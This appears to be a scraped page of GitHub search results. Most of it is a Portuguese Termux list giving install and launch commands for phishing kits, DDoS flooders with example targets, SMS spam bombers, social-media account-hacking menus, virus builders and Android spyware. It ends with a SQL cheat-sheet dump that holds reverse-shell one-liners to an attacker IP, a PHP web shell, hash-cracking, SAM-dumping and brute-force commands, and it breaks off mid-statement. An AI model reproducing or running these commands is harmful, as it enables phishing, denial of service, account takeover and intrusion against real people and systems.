16 skills found
Juanhacker051 / FOTOSPLOIT *FotoSploit* $ git clone https://github.com/Cesar-Hack-Gray/FotoSploit $ cd FotoSploit $ chmod +x * $ bash install sh $ ./FotoSploit $ show options ================================================= *instalar metasploit no termux(Facilmente)* comandos para instalar metasploit no termux 1: apt update && apt upgrade 2: apt install curl 3: curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh 4: ls 5: chmod 777 metasploit.sh 6: ls 7: ./metasploit.sh (Carregandooooo) 8: msfconsole ================================================= *EchoPwn* Instalação git clone https://github.com/hackerspider1/EchoPwn.git cd EchoPwn chmod +x install.sh EchoPwn.sh ./install.sh EchoPwn.sh ================================================= *DarkFly-Tool* Instalação apt update && apt upgrade apt install git git clone https://github.com/Ranginang67/DarkFly-Tool cd DarkFly-Tool chmod +x * python2 install.py ================================================= *Tool-x* Instalação apt update apt install git git clone https://github.com/rajkumardusad/Tool-X.git cd Tool-X chmod +x install.aex sh install.aex ou ./install.aex ================================================= *Multi_Phish* pkg instalar droplet pkg instalar openssh pkg instalar git pkg instalar curl pkg instalar wget apt instalar git php -y git clone https://github.com/perjayro/MultiPhish.git cd phish chmod 777 phish.sh bash phish.sh ================================================= *Pentest Tools Framework* git clone https://github.com/pikpikcu/Pentest-Tools-Framework.git cd Pentest-Tools-Framework pip install -r require.txt python install.py python ptf.py ================================================= *Destroyer-framework* ⭕️LINUX git clone https://github.com/Cesar-Hack-Gray/Destroyer-framework cd Destroyer-framework ls bash install.sh ./Destroyer ⭕️TERMUX apt upgrede -y && pkg update -y apt install -y apt install -y curl apt install git git clone https://github.com/Cesar-Hack-Gray/Destroyer-framework cd Destroyer-framework ls bash install.sh ./Destroyer ================================================= *NIKTO* Instalação git clone https://github.com/sullo/nikto apt-get install openssl libcrypt-ssleay-perl Uso de proxys: perl nikto.pl -h localhost -p 8080 -useproxy proxyIp Atualizando Nikto: perl nikto.pl -update ================================================= *SocialFish* Instalação $ apt update && upgrade $ apt install git $ apt install python2 $ git clone https://github.com/UndeadSec/SocialFish.git $ cd SocialFish $ chmod +x * $ pip2 install -r requirements.txt ================================================= *Opal [ATUALIZADO]* git clone https://github.com/shadowlabscc/ProjectOpal.git cd ProjectOpal python opal.py python Injector.py ================================================= *Kit de ferramentas para bugbounty. #CVEs* https://github.com/Medicean/VulApps https://github.com/qazbnm456/awesome-cve-poc https://github.com/tunz/js-vuln-db https://github.com/cve-search/cve-search https://github.com/nixawk/labs https://github.com/Coalfire-Research/java-deserialization-exploits https://github.com/Metnew/uxss-db https://github.com/TH3xACE/SUDO_KILLER https://github.com/Mr-xn/Penetration_Testing_POC https://github.com/toolswatch/vFeed ================================================= *Para pegar informações* 1️⃣ Phone In Foga https://github.com/sundowndev/PhoneInfoga 2️⃣ In Foga - Email https://github.com/m4ll0k/Infoga 3️⃣ Angry Fuzz3r https://github.com/ihebski/angryFuzzer 4️⃣ Hakku Framework https://github.com/4shadoww/hakkuframework 5️⃣ Knock Mail https://github.com/4w4k3/KnockMail 6️⃣ Santet Online https://github.com/Gameye98/santet-online 7️⃣ The Harvester https://github.com/laramies/theHarvester 8️⃣ Optiva Framework https://github.com/joker25000/Optiva-Framework 9️⃣ Cyber Scan https://github.com/medbenali/CyberScan 🔟 Gloom Framework https://github.com/StreetSec/Gloom-Framework ================================================= *OXID Tools* git clone https://github.com/oxyda-fox/OXIDTools.git cd OXIDTools chmod +x * . /setup.sh . /run.sh ================================================= *xShock* Instalação git clone https://github.com/capture0x/xShock/ cd xShock pip3 install -r requirements.txt Executar python3 main.py ================================================= *Web Pentest* Instalação apt update && apt upgrade apt install git apt install python2 apt install python git clone https://github.com/cr4shcod3/pureblood cd pureblood chmod +x * pip install -r requirements.txt Uso python2 pureblood.py ================================================= *Quack* Requisitos apt update && apt upgrade -y termux-setup-storage pkg install -y git pkg install -y python pip install --upgrade pip pip install requests Instalação git clone https://github.com/entynetproject/quack cd quack pip install -r requirements.txt chmod +x quack ================================================= *Thoron Framework* git clone https://github.com/entynetproject/thoron.git cd thoron chmod + x install.sh ./install.sh ================================================= *BlackPhish* git clone https://github.com/Ahmedmahmed8a/BlackPhish cd BlackPhish bash installer.sh ================================================= *RapidPayload* git clone https://github.com/AngelSecurityTeam/RapidPayload cd RapidPayload bash install.sh python3 RapidPayload.py ================================================= *Termux_ExtraKeys* apt update && apt upgrade -y apt install git -y git clone https://github.com/Fabrix07Hack/Termux_ExtraKeys.git cd Termux_ExtraKeys chmod 777 * ./extrakeys_Termux ================================================= *PyReconExSploit* apt-get update apt-get upgrade apt-get install exploitdb netcat nmap perl php git clone https://github.com/AkutoSai/PyReconExSploit cd PyReconExSploit/ python3 setup.py install cp -r /home/user/Desktop/PyReconExSploit/pyreconexsploit /usr/local/lib/python3.7/dist-packages pyreconexsploit ================================================= *Evil Framework* apt update apt upgrade pip2 install requests git clone https://github.com/LOoLzeC/Evil-create-framework cd Evil-create-framework python2 vcrt.py show android help Escolha um virus create virus"seu virus" SET OUTPUT cd /sdcard SET VIRUS NAME "nome do seu virus" run ================================================= *Wifite* apt update && apt upgrade apt install git apt install python2 git clone https://github.com/derv82/wifite2 ls cd wifite ls python2 wifite.py ================================================= *MALICIOUS* $ termux-setup-storage $ cd /sdcard $ apt install git $ apt install python2 $ apt install ruby $ gem install lolcat $ git clone https://github.com/Hider5/Malicious $ cd Malicious $ pip2 install -r requirements.txt $ python2 malicious.py ================================================= *Hammer* apt update apt-get install python -y apt install git apt install python3 git clone https://github.com/cyweb/hammer ls cd hammer chmod +x hammer.py python3 hammer.py -s (alvo) -p 80 -t 150 ================================================= *VIRUS X* $ apt update && apt upgrade $ apt install git $ apt install python $ git clone https://github.com/TSMaitry/VirusX.git $ cd VirusX $ chmod +x VirusX.py $ python2 VirusX.py ================================================= *INFECT* $ apt-get update -y $ apt-get upgrade -y $ apt install python -y $ apt install python2 -y $ apt install git -y $ pip install lolcat $ git clone https://github.com/noob-hackers/Infect $ ls $ cd infect $ ls $ bash infect.sh ================================================= *F-Society Framework* (Instalação) apt install git apt install python2 (Instalação do pacote) git clone https://github.com/Manisso/fsociety ls cd fsociety ls chmod +x fsociety.py ./install.sh python2 fsociety.py ================================================= *MyServer* Abra o termux e digite os seguintes comandos. apt update apt install git git clone https://github.com/rajkumardusad/MyServer cd MyServer chmod +x install ./install ================================================= *AirCrack-ng* apt update apt install root-repo apt install aircrack-ng ================================================= *RouterSploit* apt update && apt upgrade apt install python -y pip2 install apt install git git clone https://github.com/threat9/routersploit ls cd routersploit pip2 install -r requirements -dev.txt pip install future ls python rsf.py ================================================= *Shell Phish* apt update apt upgrade -y termux-setup-storage apt installl git git clone https://github.com/thelinuxchoice/shellphish cd shellphish apt installl php apt install curl git clone https://github.com/PSecurity/ps.ngrok cd ps.ngrok mv ngrok /data/data/com.termux/files/home/shellphish/ cd .. rm -rf ps.ngrok chmod +x ngrok chmod +x shellphish.sh bash shellphish.sh # Ao Iniciar: cd shellphish bash shellphish.sh comandos : pkg install clang git clone https://github.com/XCHADXFAQ77X/XERXES ls cd XERXES ls chmod +x * ls clang xerxes.c -o xerxes ./xerxes exemplo: website.com.br 80 galera lembrando nao bote HTTPS nem www so o nome do site exemplo : website.com.br ``` ALGUNS COMANDOS DO TERMUX BY: BAN``` apt update && apt upgrade termux-setup-storage apt install git apt install net-tools apt install termux-tools apt install neofetch apt install ncurses-utils apt install curl curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh chmod +x metasploit.sh ./metasploit.sh msfconsole ____________________________________________ https://github.com/PSecurity/ps.ngrok termux-setup-storage apt update && apt upgrade -y pkg update && pkg upgrade -y apt install curl pkg install git git clone https://github.com/PSecurity/ps.ngrok cd ps.ngrok mv ngrok /data/data/com.termux/files/home cd .. chmod +x ngrok ./ngrok ( chave de ativação NGROK) ./ngrok http 80 ________________________________________________ apt update Apt install python2 Apt install git Git clone https://github.com/evait-security/weeman ls cd weeman chmod +x * python2 weeman.py Set url (url) set action_url (url) run (→Abra outra página←) cd .. ./ngrok http 8080 ____________________________________________ apt update apt upgrade apt git git clone https://github.com/liorvh/hammer-1 cd hammer-1 chmod +x * python hammer.py python hammer.py -s (site + www) -t 256 -p 80 ___________________________________________________ apt install git Pkg install clang Faça a instalação do Script git clone https://github.com/zanyarjamal/xerxes Entre no diretório cd xerxes Digite o comando clang xerxes.c -o xerxes Agora e só inicia o Ataque ./xerxes website.com 80 ____________________________________________ apt update && apt upgrade apt install php apt install python2 apt install toilet apt install git git clone https://github.com/4L13199/LITESPAM cd LITESPAM ls sh LITESPAM.sh As opções aparecerão como mostrado abaixo, você apenas escolhe qual bomba de spam SMS será executada ____________________________________________ $ pkg update $ pkg upgrade $ pkg install git $ pkg install php $ pkg install toilet $ pkg install python2 $ gem install lolcat $ pip2 install requests $ pip2 install termcolor $ git clone https://github.com/mbest99/MIXINGS.git $ cd MIXINGS $ bash 0ppay.sh Features:- [ 1] PHISING V1 [ 2] PHISING V2 [ 3] PHISING V3 [ 4] PHISING V4 [ 5] PHISING GAME [ 6] Hack fb target [ 7] Hack fb massal [ 8] Hack fb Target+Massal [ 9] Hack FB ans (#root) [10] Hack Instagram (#root) [11] Hack Twitter (#root) [12] Hack Gmail (#root) [13] Fb Info [14] Santet Online [15] Spam IG [16] Spam WA [17] Spam Sms [18] Youtube AutoView (#root) ____________________________________________ No termux, pra adiantar... pkg install nodejs Em seguida, crie um aplicativo e guarde o nome dele https://www.heroku.com/ $ pkg install git -y $ termux-setup-storage $ ls $ git clone -b herooku https://github.com/XploitWizer/XploitSPY $ cd XploitSPY $ ls $ pkg install nodejs $ npm install heroku -g $ heroku login -i $ heroku git:remote -a nomedoapp $ heroku buildpacks:add heroku/jvm $ heroku buildpacks:add heroku/nodejs $ git push heroku herooku:master ____________________________________________ PERSONALIZAR TERMUX apt update && apt upgrade -y pkg install nano pkg install vim cd ../usr/etc ls vim bash.bashrc Precione a letra (I) para editar o texto Depois vc apaga a seguinte mensagem que aparece no termux " PS1='\$ ' " E cola isso → PS1="\033[1;32m ╔\033[0m""\033[1;31m[ \033m""\033[1;32m SEU NOME AKI\033[0m""\033[1;31m @\033[0m""\033[1;32m║\033[0m""\033[1;37m ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡\033[0m""\033[1;32m ╚▶ " Coloca o seu nome onde tá escrito " seu nome aqui" Para sair vc clica no ESC + : + x aí você dê enter. Depois de o comando exit e dê enter, dps é só abrir dnovo ;> ____________________________________________ pkg update && pkg upgrade $pkg install python2 $pip2 install requests $pip2 install mechanize $pkg install git $git clone https://github.com/ARIYA-CYBER/NEW $cd NEW $python2 FbNew.py ____________________________________________ https://github.com/Paxv28/CrusherDDoS apt install git apt install python cd CrusherDDoS chmod +x Setup.sh ./Setup.sh python CSDDoS.py
0xdea / OneiromancerReverse engineering assistant that uses a locally running LLM to aid with pseudocode analysis.
Don-No7 / Hack SQL-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, 